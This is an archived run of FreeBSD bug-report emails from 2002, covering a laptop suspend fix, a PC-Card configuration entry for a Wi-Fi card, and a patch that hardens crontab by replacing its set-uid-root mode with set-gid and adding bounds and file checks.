freebsd-gnats-submit@FreeBSD.org, steve@stevenwills.com Cc: Subject: Re: i386/34033: Suspend doesn't work on Dell Latitude CPx laptop Date: Fri, 2 Aug 2002 23:04:43 +0200 Hi Steve I have suspend working on my Dell Latitude CPx. I'm running FreeBSD-4.6-stable from shortly after the release. I have changed the following in GENERIC and rebuilt my kernel (I have removed alot of other stuf as well but this should be enough) # Power management support (see LINT for more options) -device apm0 at nexus? disable flags 0x20 # Advanced Power Management +device apm0 at nexus? flags 0x20 # Advanced Power Management Can you please try and report back if that solves your problem. /Johan K -- Johan Karlsson mailto:johan@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Aug 2 14:40:40 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 761DC37B400 for ; Fri, 2 Aug 2002 14:40:03 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6835643E6A for ; Fri, 2 Aug 2002 14:40:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g72Le2JU011899 for ; Fri, 2 Aug 2002 14:40:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g72Le2Y7011898; Fri, 2 Aug 2002 14:40:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9494237B401 for ; Fri, 2 Aug 2002 14:32:31 -0700 (PDT) Received: from milla.ask33.net (milla.ask33.net [217.197.166.60]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0673543E65 for ; Fri, 2 Aug 2002 14:32:30 -0700 (PDT) (envelope-from nick@milla.ask33.net) Received: by milla.ask33.net (Postfix, from userid 1001) id CA1943ABD6C; Fri, 2 Aug 2002 23:33:15 +0200 (CEST) Message-Id: <20020802213315.CA1943ABD6C@milla.ask33.net> Date: Fri, 2 Aug 2002 23:33:15 +0200 (CEST) From: Pawel Jakub Dawidek Reply-To: Pawel Jakub Dawidek To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/41271: Non-suid-crontab. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41271 >Category: bin >Synopsis: Non-suid-crontab. >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Aug 02 14:40:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Pawel Jakub Dawidek >Release: FreeBSD 4.6-STABLE i386 >Organization: >Environment: System: FreeBSD milla.ask33.net 4.6-STABLE FreeBSD 4.6-STABLE #9: Wed Jul 31 21:18:46 CEST 2002 root@milla.ask33.net:/usr/obj/usr/src/sys/MILLA i386 >Description: Now crontab(1) is a set-uid-root binary. This is not needed, crontab could be only set-gid on unprivileged group, for example ,,crontab''. I'm sending a patch that is a port of crontab from OpenBSD, but with serious hole fixed. This patch fix some little bugs in FreeBSD crontab version too. I've added also path size checks. >How-To-Repeat: >Fix: diff -ru /usr/src/usr.sbin/cron/cron/compat.h cron/cron/compat.h --- /usr/src/usr.sbin/cron/cron/compat.h Sat Aug 28 03:15:49 1999 +++ cron/cron/compat.h Thu Aug 1 20:32:19 2002 @@ -109,7 +109,7 @@ #ifdef POSIX #include #ifdef _POSIX_SAVED_IDS -# define HAVE_SAVED_UIDS +# define HAVE_SAVED_GIDS #endif #endif @@ -133,8 +133,4 @@ #if !defined(UNICOS) && !defined(UNIXPC) # define HAS_FCHOWN -#endif - -#if !defined(UNICOS) && !defined(UNIXPC) -# define HAS_FCHMOD #endif diff -ru /usr/src/usr.sbin/cron/cron/cron.h cron/cron/cron.h --- /usr/src/usr.sbin/cron/cron/cron.h Tue May 29 01:37:26 2001 +++ cron/cron/cron.h Fri Aug 2 03:12:50 2002 @@ -74,6 +74,8 @@ #define MAX_TEMPSTR 100 /* obvious */ #define MAX_UNAME 20 /* max length of username, should be overkill */ #define ROOT_UID 0 /* don't change this, it really must be root */ +#define WHEEL_GID 0 /* don't change this, it really must be wheel */ +#define CRONTAB_GID 88 /* gid of "crontab" group */ #define ROOT_USER "root" /* ditto */ /* NOTE: these correspond to DebugFlagNames, @@ -219,7 +221,7 @@ set_debug_flags __P((char *)), get_char __P((FILE *)), get_string __P((char *, int, FILE *, char *)), - swap_uids __P((void)), + swap_gids __P((void)), load_env __P((char *, FILE *)), cron_pclose __P((FILE *)), strcmp_until __P((char *, char *, int)), diff -ru /usr/src/usr.sbin/cron/cron/database.c cron/cron/database.c --- /usr/src/usr.sbin/cron/cron/database.c Sat Aug 28 03:15:50 1999 +++ cron/cron/database.c Fri Aug 2 03:38:49 2002 @@ -87,7 +87,7 @@ new_db.head = new_db.tail = NULL; if (syscron_stat.st_mtime) { - process_crontab("root", "*system*", + process_crontab(ROOT_USER, "*system*", SYSCRONTAB, &syscron_stat, &new_db, old_db); } @@ -113,9 +113,13 @@ if (dp->d_name[0] == '.') continue; - (void) strncpy(fname, dp->d_name, sizeof(fname)); - fname[sizeof(fname)-1] = '\0'; + (void) strncpy(fname, dp->d_name, sizeof fname - 1); + fname[sizeof fname - 1] = '\0'; + if (strlen(fname) >= sizeof fname - 1) + continue; /* XXX log? */ (void) snprintf(tabname, sizeof tabname, CRON_TAB(fname)); + if (strlen(tabname) >= sizeof tabname - 1) + continue; /* XXX log? */ process_crontab(fname, fname, tabname, &statbuf, &new_db, old_db); @@ -182,7 +186,6 @@ cron_db *db; char *name; { - char *env_get(); user *u; for (u = db->head; u != NULL; u = u->next) @@ -204,6 +207,8 @@ struct passwd *pw = NULL; int crontab_fd = OK - 1; user *u; + uid_t pwuid; + gid_t pwgid; if (strcmp(fname, "*system*") && !(pw = getpwnam(uname))) { /* file doesn't have a user in passwd file. @@ -211,6 +216,14 @@ log_it(fname, getpid(), "ORPHAN", "no passwd entry"); goto next_crontab; } + /* this have to be done, because of fake "*system*" files */ + if (pw) { + pwuid = pw->pw_uid; + pwgid = pw->pw_gid; + } else { + pwuid = ROOT_UID; + pwgid = WHEEL_GID; + } if ((crontab_fd = open(tabname, O_RDONLY, 0)) < OK) { /* crontab not accessible? @@ -221,6 +234,26 @@ if (fstat(crontab_fd, statbuf) < OK) { log_it(fname, getpid(), "FSTAT FAILED", tabname); + goto next_crontab; + } + if (!S_ISREG(statbuf->st_mode)) { + log_it(fname, getpid(), "NOT REGULAR", tabname); + goto next_crontab; + } + if ((statbuf->st_mode & 07777) != 0600) { + log_it(fname, getpid(), "BAD FILE MODE", tabname); + goto next_crontab; + } + if (statbuf->st_uid != pwuid) { + log_it(fname, getpid(), "WRONG FILE USER OWNER", tabname); + goto next_crontab; + } + if (statbuf->st_gid != pwgid) { + log_it(fname, getpid(), "WRONG FILE GROUP OWNER", tabname); + goto next_crontab; + } + if (statbuf->st_nlink != 1) { + log_it(fname, getpid(), "BAD LINK COUNT", tabname); goto next_crontab; } diff -ru /usr/src/usr.sbin/cron/crontab/Makefile cron/crontab/Makefile --- /usr/src/usr.sbin/cron/crontab/Makefile Wed Apr 25 14:09:24 2001 +++ cron/crontab/Makefile Fri Aug 2 03:47:20 2002 @@ -8,7 +8,8 @@ BINDIR= /usr/bin BINOWN= root -BINMODE=4555 +BINGRP= crontab +BINMODE=2555 INSTALLFLAGS=-fschg .include diff -ru /usr/src/usr.sbin/cron/crontab/crontab.c cron/crontab/crontab.c --- /usr/src/usr.sbin/cron/crontab/crontab.c Sat Jun 16 05:18:37 2001 +++ cron/crontab/crontab.c Fri Aug 2 09:56:36 2002 @@ -57,7 +57,7 @@ static PID_T Pid; static char User[MAX_UNAME], RealUser[MAX_UNAME]; -static char Filename[MAX_FNAME]; +static char Filename[MAX_FNAME + 1], TempFilename[MAX_FNAME + 1]; static FILE *NewCrontab; static int CheckErrorCount; static enum opt_t Option; @@ -69,6 +69,7 @@ check_error __P((char *)), parse_args __P((int c, char *v[])); static int replace_cmd __P((void)); +static void clean_turds(int); static void @@ -101,7 +102,6 @@ setlinebuf(stderr); #endif parse_args(argc, argv); /* sets many globals, opens a file */ - set_cron_uid(); set_cron_cwd(); if (!allowed(User)) { warnx("you (%s) are not allowed to use this program", User); @@ -200,20 +200,12 @@ if (!strcmp(Filename, "-")) { NewCrontab = stdin; } else { - /* relinquish the setuid status of the binary during - * the open, lest nonroot users read files they should - * not be able to read. we can't use access() here - * since there's a race condition. thanks go out to - * Arnt Gulbrandsen for spotting - * the race. - */ - - if (swap_uids() < OK) - err(ERROR_EXIT, "swapping uids"); + if (swap_gids() < OK) + err(ERROR_EXIT, "swapping gids"); if (!(NewCrontab = fopen(Filename, "r"))) err(ERROR_EXIT, "%s", Filename); - if (swap_uids() < OK) - err(ERROR_EXIT, "swapping uids back"); + if (swap_gids() < OK) + err(ERROR_EXIT, "swapping gids back"); } } @@ -224,12 +216,14 @@ static void list_cmd() { - char n[MAX_FNAME]; + char n[MAX_FNAME + 1]; FILE *f; int ch, x; log_it(RealUser, Pid, "LIST", User); - (void) sprintf(n, CRON_TAB(User)); + (void) snprintf(n, sizeof n, CRON_TAB(User)); + if (strlen(n) >= sizeof n - 1) + err(ERROR_EXIT, "path too long"); if (!(f = fopen(n, "r"))) { if (errno == ENOENT) errx(ERROR_EXIT, "no crontab for %s", User); @@ -266,7 +260,7 @@ static void delete_cmd() { - char n[MAX_FNAME]; + char n[MAX_FNAME + 1]; int ch, first; if (isatty(STDIN_FILENO)) { @@ -279,7 +273,9 @@ } log_it(RealUser, Pid, "DELETE", User); - (void) sprintf(n, CRON_TAB(User)); + (void) snprintf(n, sizeof n, CRON_TAB(User)); + if (strlen(n) >= sizeof n - 1) + err(ERROR_EXIT, "path too long"); if (unlink(n)) { if (errno == ENOENT) errx(ERROR_EXIT, "no crontab for %s", User); @@ -301,17 +297,18 @@ static void edit_cmd() { - char n[MAX_FNAME], q[MAX_TEMPSTR], *editor; + char n[MAX_FNAME + 1], q[MAX_TEMPSTR], *editor; FILE *f; int ch, t, x; struct stat statbuf, fsbuf; time_t mtime; WAIT_T waiter; PID_T pid, xpid; - mode_t um; log_it(RealUser, Pid, "BEGIN EDIT", User); - (void) sprintf(n, CRON_TAB(User)); + (void) snprintf(n, sizeof n, CRON_TAB(User)); + if (strlen(n) >= sizeof n - 1) + err(ERROR_EXIT, "path too long"); if (!(f = fopen(n, "r"))) { if (errno != ENOENT) err(ERROR_EXIT, "%s", n); @@ -320,20 +317,19 @@ err(ERROR_EXIT, _PATH_DEVNULL); } - um = umask(077); - (void) sprintf(Filename, "/tmp/crontab.XXXXXXXXXX"); - if ((t = mkstemp(Filename)) == -1) { - warn("%s", Filename); - (void) umask(um); - goto fatal; - } - (void) umask(um); + strncpy(Filename, "/tmp/crontab.XXXXXXXXXX", sizeof Filename - 1); + Filename[sizeof Filename - 1] = '\0'; + if (strlen(Filename) >= sizeof Filename - 1) + err(ERROR_EXIT, "path too long"); + if ((t = mkstemp(Filename)) == -1) + err(ERROR_EXIT, "%s", Filename); #ifdef HAS_FCHOWN if (fchown(t, getuid(), getgid()) < 0) { + warn("fchown"); #else if (chown(Filename, getuid(), getgid()) < 0) { + warn("chown"); #endif - warn("fchown"); goto fatal; } if (!(NewCrontab = fdopen(t, "r+"))) { @@ -402,8 +398,8 @@ goto fatal; case 0: /* child */ - if (setuid(getuid()) < 0) - err(ERROR_EXIT, "setuid(getuid())"); + if (setgid(getgid()) < 0) + err(ERROR_EXIT, "setgid(getgid())"); if (chdir("/tmp") < 0) err(ERROR_EXIT, "chdir(/tmp)"); if (strlen(editor) + strlen(Filename) + 2 >= MAX_TEMPSTR) @@ -491,9 +487,10 @@ */ static int replace_cmd() { - char n[MAX_FNAME], envstr[MAX_ENVSTR], tn[MAX_FNAME]; + char n[MAX_FNAME + 1], envstr[MAX_ENVSTR]; FILE *tmp; - int ch, eof; + int ch, eof, fd; + int error = 0; entry *e; time_t now = time(NULL); char **envp = env_init(); @@ -503,13 +500,28 @@ return (-2); } - (void) sprintf(n, "tmp.%d", Pid); - (void) sprintf(tn, CRON_TAB(n)); - if (!(tmp = fopen(tn, "w+"))) { - warn("%s", tn); + (void) snprintf(TempFilename, sizeof TempFilename, + CRON_TAB("tmp.XXXXXXXXX")); + if (strlen(TempFilename) >= sizeof TempFilename - 1) { + TempFilename[0] = '\0'; + warn("path too long"); + return (-2); + } + + if ((fd = mkstemp(TempFilename)) == -1 || !(tmp = fdopen(fd, "w+"))) { + warn("%s", TempFilename); + if (fd != -1) { + close(fd); + unlink(TempFilename); + } + TempFilename[0] = '\0'; return (-2); } + (void) signal(SIGHUP, clean_turds); + (void) signal(SIGINT, clean_turds); + (void) signal(SIGQUIT, clean_turds); + /* write a signature at the top of the file. * * VERY IMPORTANT: make sure NHEADER_LINES agrees with this code. @@ -528,9 +540,10 @@ fflush(tmp); rewind(tmp); if (ferror(tmp)) { - warnx("error while writing new crontab to %s", tn); - fclose(tmp); unlink(tn); - return (-2); + warnx("error while writing new crontab to %s", TempFilename); + fclose(tmp); + error = -2; + goto done; } /* check the syntax of the file being installed. @@ -559,49 +572,54 @@ if (CheckErrorCount != 0) { warnx("errors in crontab file, can't install"); - fclose(tmp); unlink(tn); - return (-1); + fclose(tmp); + error = -1; + goto done; } #ifdef HAS_FCHOWN - if (fchown(fileno(tmp), ROOT_UID, -1) < OK) + if (fchown(fileno(tmp), getuid(), getgid()) < OK) { + warn("fchown"); #else - if (chown(tn, ROOT_UID, -1) < OK) -#endif - { + if (chown(TempFilename, getuid(), getgid()) < OK) { warn("chown"); - fclose(tmp); unlink(tn); - return (-2); - } - -#ifdef HAS_FCHMOD - if (fchmod(fileno(tmp), 0600) < OK) -#else - if (chmod(tn, 0600) < OK) #endif - { - warn("chown"); - fclose(tmp); unlink(tn); - return (-2); + fclose(tmp); + error = -2; + goto done; } if (fclose(tmp) == EOF) { warn("fclose"); - unlink(tn); - return (-2); + error = -2; + goto done; } - (void) sprintf(n, CRON_TAB(User)); - if (rename(tn, n)) { - warn("error renaming %s to %s", tn, n); - unlink(tn); - return (-2); + (void) snprintf(n, sizeof n, CRON_TAB(User)); + if (strlen(n) >= sizeof n - 1) { + warn("path too long"); + error = -2; + goto done; } + if (rename(TempFilename, n)) { + warn("error renaming %s to %s", TempFilename, n); + error = -2; + goto done; + } + TempFilename[0] = '\0'; log_it(RealUser, Pid, "REPLACE", User); poke_daemon(); - return (0); +done: + (void) signal(SIGHUP, SIG_DFL); + (void) signal(SIGINT, SIG_DFL); + (void) signal(SIGQUIT, SIG_DFL); + if (TempFilename[0]) { + (void) unlink(TempFilename); + TempFilename[0] = '\0'; + } + return (error); } @@ -623,4 +641,20 @@ return; } #endif /*USE_UTIMES*/ +} + + +static void +clean_turds(signo) + int signo; +{ + int save_errno = errno; + + if (TempFilename[0]) + (void) unlink(TempFilename); + if (signo) { + (void) signal(signo, SIG_DFL); + (void) raise(signo); + } + errno = save_errno; } diff -ru /usr/src/usr.sbin/cron/lib/misc.c cron/lib/misc.c --- /usr/src/usr.sbin/cron/lib/misc.c Mon Apr 29 00:45:53 2002 +++ cron/lib/misc.c Fri Aug 2 03:32:07 2002 @@ -210,7 +210,11 @@ */ if (stat(SPOOL_DIR, &sb) < OK && errno == ENOENT) { warn("%s", SPOOL_DIR); - if (OK == mkdir(SPOOL_DIR, 0700)) { + if (OK == mkdir(SPOOL_DIR, 0730)) { + if (OK != chown(SPOOL_DIR, ROOT_UID, CRONTAB_GID)) { + rmdir(SPOOL_DIR); + err(ERROR_EXIT, "%s: chown", SPOOL_DIR); + } warnx("%s: created", SPOOL_DIR); stat(SPOOL_DIR, &sb); } else { @@ -219,6 +223,20 @@ } if (!(sb.st_mode & S_IFDIR)) err(ERROR_EXIT, "'%s' is not a directory, bailing out", SPOOL_DIR); + if (sb.st_uid != ROOT_UID || sb.st_gid != CRONTAB_GID) { + if (OK != chown(SPOOL_DIR, ROOT_UID, CRONTAB_GID)) { + rmdir(SPOOL_DIR); + err(ERROR_EXIT, "%s: chown", SPOOL_DIR); + } + warnx("%s: set owner user and group", SPOOL_DIR); + } + if ((sb.st_mode & 07777) != 0730) { + if (OK != chmod(SPOOL_DIR, 0730)) { + rmdir(SPOOL_DIR); + err(ERROR_EXIT, "%s: chmod", SPOOL_DIR); + } + warnx("%s: set permissions", SPOOL_DIR); + } } @@ -244,15 +262,19 @@ } if (!fp) { - char pidfile[MAX_FNAME]; + char pidfile[MAX_FNAME + 1]; char buf[MAX_TEMPSTR]; int fd, otherpid; - (void) sprintf(pidfile, PIDFILE, PIDDIR); + (void) snprintf(pidfile, sizeof pidfile, PIDFILE, PIDDIR); + if (strlen(pidfile) >= sizeof pidfile - 1) { + log_it("CRON", getpid(), "DEATH", "path too long"); + errx(ERROR_EXIT, "path too long"); + } if ((-1 == (fd = open(pidfile, O_RDWR|O_CREAT, 0644))) || (NULL == (fp = fdopen(fd, "r+"))) ) { - sprintf(buf, "can't open or create %s: %s", + snprintf(buf, sizeof buf, "can't open or create %s: %s", pidfile, strerror(errno)); log_it("CRON", getpid(), "DEATH", buf); errx(ERROR_EXIT, "%s", buf); @@ -262,7 +284,8 @@ int save_errno = errno; fscanf(fp, "%d", &otherpid); - sprintf(buf, "can't lock %s, otherpid may be %d: %s", + snprintf(buf, sizeof buf, + "can't lock %s, otherpid may be %d: %s", pidfile, otherpid, strerror(save_errno)); log_it("CRON", getpid(), "DEATH", buf); errx(ERROR_EXIT, "%s", buf); @@ -390,7 +413,7 @@ char line[MAX_TEMPSTR]; rewind(file); - while (fgets(line, MAX_TEMPSTR, file)) { + while (fgets(line, sizeof line, file)) { if (line[0] != '\0') if (line[strlen(line)-1] == '\n') line[strlen(line)-1] = '\0'; @@ -410,20 +433,13 @@ allowed(username) char *username; { - static int init = FALSE; - static FILE *allow, *deny; + static FILE *allow = NULL, *deny = NULL; - if (!init) { - init = TRUE; #if defined(ALLOW_FILE) && defined(DENY_FILE) - allow = fopen(ALLOW_FILE, "r"); - deny = fopen(DENY_FILE, "r"); - Debug(DMISC, ("allow/deny enabled, %d/%d\n", !!allow, !!deny)) -#else - allow = NULL; - deny = NULL; + allow = fopen(ALLOW_FILE, "r"); + deny = fopen(DENY_FILE, "r"); + Debug(DMISC, ("allow/deny enabled, %d/%d\n", !!allow, !!deny)) #endif - } if (allow) return (in_file(username, allow)); @@ -591,7 +607,7 @@ *dst++ = '^'; *dst++ = '?'; } else { /* parity character */ - sprintf(dst, "\\%03o", ch); + snprintf(dst, 5, "\\%03o", ch); dst += 4; } } @@ -645,11 +661,9 @@ #endif /*MAIL_DATE*/ -#ifdef HAVE_SAVED_UIDS -static int save_euid; -int swap_uids() { save_euid = geteuid(); return seteuid(getuid()); } -int swap_uids_back() { return seteuid(save_euid); } -#else /*HAVE_SAVED_UIDS*/ -int swap_uids() { return setreuid(geteuid(), getuid()); } -int swap_uids_back() { return swap_uids(); } -#endif /*HAVE_SAVED_UIDS*/ +#ifdef HAVE_SAVED_GIDS +static int save_egid; +int swap_gids() { save_egid = getegid(); return setegid(getgid()); } +#else /*HAVE_SAVED_GIDS*/ +int swap_gids() { return setregid(getegid(), getgid()); } +#endif /*HAVE_SAVED_GIDS*/ >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Aug 2 14:50:12 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5ADF537B400 for ; Fri, 2 Aug 2002 14:50:07 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1C3FF43E3B for ; Fri, 2 Aug 2002 14:50:07 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g72Lo6JU012903 for ; Fri, 2 Aug 2002 14:50:06 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g72Lo6qM012901; Fri, 2 Aug 2002 14:50:06 -0700 (PDT) Date: Fri, 2 Aug 2002 14:50:06 -0700 (PDT) Message-Id: <200208022150.g72Lo6qM012901@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Johan Karlsson Subject: Re: i386/34033: Suspend doesn't work on Dell Latitude CPx laptop Reply-To: Johan Karlsson Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR i386/34033; it has been noted by GNATS. From: Johan Karlsson To: freebsd-gnats-submit@FreeBSD.org, steve@stevenwills.com Cc: Subject: Re: i386/34033: Suspend doesn't work on Dell Latitude CPx laptop Date: Fri, 2 Aug 2002 23:46:57 +0200 Hi two more things: you also should add 'apm_enable="YES"' to /etc/rc.conf and you should read the BUGS section of % man 4 apm before doing any of this. /Johan K On Fri, Aug 02, 2002 at 23:04 (+0200) +0000, Johan Karlsson wrote: > Hi Steve > > I have suspend working on my Dell Latitude CPx. > > I'm running FreeBSD-4.6-stable from shortly after the release. > > I have changed the following in GENERIC and rebuilt my kernel > (I have removed alot of other stuf as well but this should be enough) > > # Power management support (see LINT for more options) > -device apm0 at nexus? disable flags 0x20 # Advanced Power Management > +device apm0 at nexus? flags 0x20 # Advanced Power Management > > > Can you please try and report back if that solves your problem. > > /Johan K > > -- > Johan Karlsson mailto:johan@FreeBSD.org -- Johan Karlsson mailto:johan@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Aug 2 17: 0:18 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 62B7137B401 for ; Fri, 2 Aug 2002 17:00:09 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6970843E3B for ; Fri, 2 Aug 2002 17:00:08 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g73008JU034587 for ; Fri, 2 Aug 2002 17:00:08 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g73008fq034586; Fri, 2 Aug 2002 17:00:08 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 69B9637B400 for ; Fri, 2 Aug 2002 16:58:28 -0700 (PDT) Received: from mail.tecdigital.net (midgar.tecdigital.net [67.29.135.15]) by mx1.FreeBSD.org (Postfix) with ESMTP id 25EE843E42 for ; Fri, 2 Aug 2002 16:58:28 -0700 (PDT) (envelope-from root@tecdigital.net) Received: from bender.tecdigital.net (unknown [148.243.211.1]) by mail.tecdigital.net (Postfix) with ESMTP id C85EB22505 for ; Fri, 2 Aug 2002 18:58:12 -0500 (CDT) Received: by bender.tecdigital.net (Postfix, from userid 0) id 1821A281EA; Fri, 2 Aug 2002 18:57:56 -0500 (CDT) Message-Id: <20020802235756.1821A281EA@bender.tecdigital.net> Date: Fri, 2 Aug 2002 18:57:56 -0500 (CDT) From: Mario Doria Reply-To: Mario Doria To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: conf/41273: USR Wi-Fi Card type 2410 is not detected correctly Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41273 >Category: conf >Synopsis: USR Wi-Fi Card type 2410 is not detected correctly >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: update >Submitter-Id: current-users >Arrival-Date: Fri Aug 02 17:00:07 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Mario Doria >Release: FreeBSD 4.6-STABLE i386 >Organization: TecDigital >Environment: System: FreeBSD wark 4.6-STABLE FreeBSD 4.6-STABLE #0: Thu Jul 25 03:54:25 CDT 2002 root@wark:/usr/src/sys/compile/WARK i386 >Description: When inserting my PC-CARD, it was not detected. By removing a space in the name of the card in /etc/defaults/pccard.conf, the card worked. I added a new card description in the attached diff because I upgraded this card to the latest firmware. I do not know if this changed the name the card reports to the system. >How-To-Repeat: By inserting a Wi-Fi US Robotics 11 Mbit card, type 2410; it is not detected by the default /etc/defaults/pccard.conf >Fix: Attached is a file with the new card description. +++ /etc/defaults/pccard.conf Fri Aug 2 18:46:02 2002 @@ -2020,6 +2020,11 @@ remove /etc/pccard_ether $device stop # U.S. Robotics Wireless Card 2410 +card "U.S. Robotics" "IEEE 802.11b PC-CARD" + config auto "wi" ? + insert /etc/pccard_ether $device start + remove /etc/pccard_ether $device stop + card "U. S. Robotics" "IEEE 802.11b PC-CARD" config auto "wi" ? insert /etc/pccard_ether $device start >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Aug 2 18:10:13 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 77F3537B400 for ; Fri, 2 Aug 2002 18:10:08 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3681D43E5E for ; Fri, 2 Aug 2002 18:10:08 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g731A4JU049891 for ; Fri, 2 Aug 2002 18:10:04 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g731A4eN049889; Fri, 2 Aug 2002 18:10:04 -0700 (PDT) Date: Fri, 2 Aug 2002 18:10:04 -0700 (PDT) Message-Id: <200208030110.g731A4eN049889@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Steve Wills Subject: Re: i386/34033: Suspend doesn't work on Dell Latitude CPx laptop Reply-To: Steve Wills Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR i386/34033; it has been noted by GNATS. From: Steve Wills To: Johan Karlsson Cc: freebsd-gnats-submit@freebsd.org Subject: Re: i386/34033: Suspend doesn't work on Dell Latitude CPx laptop Date: Fri, 2 Aug 2002 21:03:37 -0400 Thanks for the tips. Unfortunately, I don't have that laptop any more so I can't test. I'd say that since you have it working on yours, its probably ok and you can close this bug report if you want. Thanks, Steve On Fri, Aug 02, 2002 at 11:46:57PM +0200, Johan Karlsson wrote: > Hi > > two more things: > > you also should add > 'apm_enable="YES"' > to /etc/rc.conf and you should read the BUGS section of > % man 4 apm > before doing any of this. > > /Johan K > > On Fri, Aug 02, 2002 at 23:04 (+0200) +0000, Johan Karlsson wrote: > > Hi Steve > > > > I have suspend working on my Dell Latitude CPx. > > > > I'm running FreeBSD-4.6-stable from shortly after the release. > > > > I have changed the following in GENERIC and rebuilt my kernel > > (I have removed alot of other stuf as well but this should be enough) > > > > # Power management support (see LINT for more options) > > -device apm0 at nexus? disable flags 0x20 # Advanced Power Management > > +device apm0 at nexus? flags 0x20 # Advanced Power Management > > > > > > Can you please try and report back if that solves your problem. > > > > /Johan K > > > > -- > > Johan Karlsson mailto:johan@FreeBSD.org > > -- > Johan Karlsson mailto:johan@FreeBSD.org -- Take it easy, we're in a hurry. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Aug 2 18:29:43 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 393A037B400; Fri, 2 Aug 2002 18:29:42 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id E032743E6E; Fri, 2 Aug 2002 18:29:41 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g731TfJU052158; Fri, 2 Aug 2002 18:29:41 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) 